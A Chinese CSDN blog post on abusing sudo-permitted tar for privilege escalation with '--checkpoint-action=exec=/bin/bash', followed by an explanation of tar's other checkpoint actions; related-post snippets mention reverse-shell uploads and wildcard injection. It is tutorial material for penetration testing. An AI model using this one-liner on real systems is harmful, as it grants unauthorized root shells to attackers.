使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用

最新推荐文章于 2024-03-05 08:46:08 发布
最新推荐文章于 2024-03-05 08:46:08 发布
阅读量3.4k 收藏 11
点赞数 2
分类专栏: 渗透 文章标签: linux 渗透测试 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33958714/article/details/111084322
版权

如果管理员给予了某个普通用户tar命令的超级管理员操作:

那么我们可以使用tar命令进行提权,命令如下

sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"

-c:创建新的档案文件,相当于打包(-x,相反的操作,拆包)

-f:使用档名,f之后直接加档名,中间不能加其他参数

--checkpoint=n:每写入n个记录之后设置一个检查点,在检查点可以执行任意的操作,操作由--checkpoint-action指定

exec:执行外部命令

下图体现checkpoint作用

 

下面是--checkpoint-action的各种参数和用法:

echo

 

也可以这样写

%s:检查点的类型,可以取两个值,写入或者读取

%u:检查点编号

%{r,w,d}T

打印到目前为止传输的字节数和传输速度。可选参数提供相应的在读取、写入和删除字节数之前使用的前缀。如果不存在,则默认为“R”。`W',`D'。它们中的任何一个或全部都可以省略,因此,例如,%{}T:表示打印不带任何前缀的相应统计信息。任何多余的参数,如果存在,都会被默默地忽略。

%{fmt}t:使用fmt作为strftime格式输出当前本地时间,{fmt}部分是可选的。如果不存在,则默认格式为“%c”,即当前区域设置的首选日期和时间表示。

%n*:用空格将输出填充到第n列。如果省略{n}部分,则使用当前屏幕宽度。

%c:这是“%{%Y-%m-%d%H:%m:%S}t:%ds,%{read,writed}t%*\r”的快捷方式,主要用于“ttyout”操作(见下文)。

打印当前本地时间、tar启动后过期的秒数、检查点序号、传输的字节数和平均计算的I/O速度。

--checkpoint-action=ttyout='%{%Y-%m-%d %H:%M:%S}t (%d sec): #%u, %T%*\r'

“ttyout=string”操作将字符串输出到控制台“/dev/tty”,因此即使将标准输出重定向到其他位置,也可以使用它。字符串的修改与“echo”操作相同。与后者不同的是,“ttyout”不在字符串前面加tar可执行文件名,也不在其后输出新行。例如,以下操作将在同一屏幕行打印检查点消息,覆盖以前的任何消息

 

--checkpoint-action="ttyout=Hit %s checkpoint #%u%*\r"

另一个可用的检查点操作是“dot”(或“.”)。它指示tar在标准列表流上打印一个点,例如:

tar -c --checkpoint=1000 --checkpoint-action=dot /var

还有一个操作“sleep”,将tar暂停指定的秒数。以下示例将在每个检查点停止30秒:

tar -c --checkpoint=1000 --checkpoint-action=sleep=30

wait=signo操作停止进一步的执行,直到signo信号被传递。signo的有效值为:SIGHUP、SIGQUIT、SIGINT、SIGUSR1和SIGUSR2。“SIG”前缀是可选的。例如:

tar -c -f arc --checkpoint=1000 --checkpoint-action wait=USR1 .

在这个例子中,tar将在每1000个检查点停止存档。等待“SIGUSR1”信号发出,然后继续处理。

 

 

 

 

 

 

不会改BUG的小萌新
关注
专栏目录
【Image captioning】Show, Attend, and Tell 从零到掌握之八--caption.py代码详解
安静到无声
07-08 1265
代码的内容与第六章节基本一致具体介绍请参看【Image captioning】Show, Attend, and Tell 从零到掌握之七–eval.py代码详解_安静到无声的博客-CSDN博客。
nivek(tar提权
m0_66299232的博客
11-09 809
3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。2.寻找有suid执行权限的文件,发现有一个/bin/bash。4.把反弹shell的命令写入.sh文件中,等待反弹。1.用gobuster探测目录,没探测出来。5.成功登录进去,寻找可利用信息,和上传点。6.成功进入root,轻松拿下!点俩次放包,页面就进去了。
checkpoint_ep200.pth.tar
08-13
该文档为 行人重识别 Person Re-ID 数据集 Market1501 Baseline 200 epoch checkpoint
tar提权
m0_57221101的博客
01-21 1354
当某台机器给予tar sudo更高权限的时候可以尝试使用以下方式来提权 方法一 sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash 借用tar检查点功能实现提权 -c 建立一个新的压缩文档 -f 指定压缩文档 --checkpoint=n 每写入n项记录进行一次检查点操作 --checkpoint-action每次到检查点时执行的操作,语法格式符合shell脚
tar打印进度
认真你就输了
09-26 6328
tar xf ~/work/target-iMX6-rootfs-20130918_2231_DEVELOP.tar.bz2 --checkpoint=100 --checkpoint-action=dot --totals ......................................................................................
Tryhackme -Skynet(考点:smb & 密码爆破 & cuppa RFI & cronjob - tar提权
冬萍子癸水
05-27 544
1 扫描 忘了截图了,就是445 smb和80http,一个进去找敏感文件,另一个进去搜集信息。 2 web信息搜集 gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64 松鼠邮件那个进去后是登录框。但是不知道密码 3 smb利用 enum4linux -a Ip地址 看到有俩处,匿名的当然可以进,mile那个没密码。 进匿名看,再log里,看到很多密码似的,保存下来,可
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
tar命令集合(详解
三毛创作记
06-09 3906
tar 命令可以将许多文件一起保存至一个单独的磁带或磁盘归档,并能从归档中单独还原所需文件。 示例 以test文件为例 压缩命令 tar -cvf test.tar test test1 解压命令 tar -xvf test.tar操作模式: -A, --catenate, --concatenate 追加 tar 文件至归档 -c, --create 创建一个新归档 -d, --diff, --compare 找出归档和文件系统的差异 –delete
UV-Net的复现
最新发布
bettle_king的博客
03-05 524
SolidLetters数据集由96k个3D形状组成。train.txt和test.txt存的是训练和测试的标签名称,是一个字符串。
kali linux解压tar.xz,Linux—解压缩命令总结(tar/zip)
weixin_39617497的博客
05-13 1436
1 tar1.2 tar介绍tar命令是linux系统中对文件和目录解压缩命令。tar命令可以用于对后缀名为.tar,tar.gz等常用文件。1.3 tar参数系统中通过tar --help查看:Main operation mode:-A, --catenate, --concatenate append tar files to an archive-c, --create ...
checkpoint.tar
08-27
自用
【云原生进阶之容器】第五章容器运行时5.8--容器热迁移
junbaozi的专栏
04-12 554
容器使用 CRIU (Checkpoint Restore in Userspace)技术进行容器的迁移,它是一个 Linux 软件工具,使用此工具,可以冻结正在运行的应用程序,并将其导出为磁盘上的文件集合。然后,可以使用这些文件来恢复应用程序,恢复之后程序和被冻结的时候状态一致。使用 Checkpoint 和 Restore 功能,将进程组(传统容器从本质上来讲就是系统中的一个或者一组进程)冻结与恢复。
Tar 命令参数详解
ewdeew的博客
04-13 1147
4.1、Tar 命令参数详解 -A, --catenate, --concatenate 将存档与已有的存档合并 -c, --create 建立新的存档 -d, --diff, --compare 比较存档与当前文件的不同之处 –delete 从存档中删除 -r, --append 附加到存档结尾 -t, --list 列出存档中文件的目录 -u, --update 仅将较新的文件附加到存档中 -...
Flink详解系列之八--Checkpoint和Savepoint
wr_java的博客
04-13 1124
当一个算子接收到第一个输入流的快照barrier n时,它不能继续处理该流的其他数据,而是需要等待接收到最后一个流的barrier n,才可以生成算子的状态快照和发送挂起的输出记录,然后发送快照barrier n。savepoint使用检查点机制创建的,作业执行状态的全局镜像,可用于flink的停止与恢复,升级等。由于有些算子是有状态的,有些算子是无状态的,实际上只要给有状态的算子添加算子ID就可以,但很多人并不太清楚哪些算子是有状态的,哪些是无状态的,所以,实际操作中,尽量给每个算子手动配置算子ID。
Linux下的tar压缩解压缩命令详解
johnhuster的专栏
04-23 857
tar -c: 建立压缩档案 -x:解压 -t:查看内容 -r:向压缩归档文件末尾追加文件 -u:更新原压缩包中的文件 这五个是独立的命令,压缩解压都要用到其中一个,可以和别的命令连用但只能用其中一个。下面的参数是根据需要在压缩或解压档案时可选的。 -z:有gzip属性的 -j:有bz2属性的 -Z:有compress属性的 -v:显示所有过程 -O:将文件解开到标准输出 下面的参数-f是必须的 -f: 使用档案名字,切记,这个参数是最后一个参数,后面只能接档案名。 # tar -cf all.t
linux定时任务打包提权&docker组提权
m0_62207170的博客
03-03 702
linux定时任务打包提权&docker组提权
操作系统权限提升(二十三)之Linux提权-通配符(ws)提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 998
接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致提权。如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到提权的目的,我们以tar命令为例子。可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了。查看计划任务,发现有滥用通配符的,并且是root权限,可以进行提权
linux压缩解压
weixin_49636863的博客
03-07 118
tar -cvf file2.tar checkpoints cd 到checkpoints所在位置,将checkpoints文件夹压缩成file2.tar rar x baby.rar 解压
出现error:--resume checkpoint does not exist
09-17
checkpoint是一种保存程序运行状态的机制,在许多应用中可用于保存模型参数、中间结果等。当程序需要恢复之前的运行状态时,可以使用checkpoint来实现。然而,如果指定的checkpoint不存在,程序就无法正确地恢复之前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值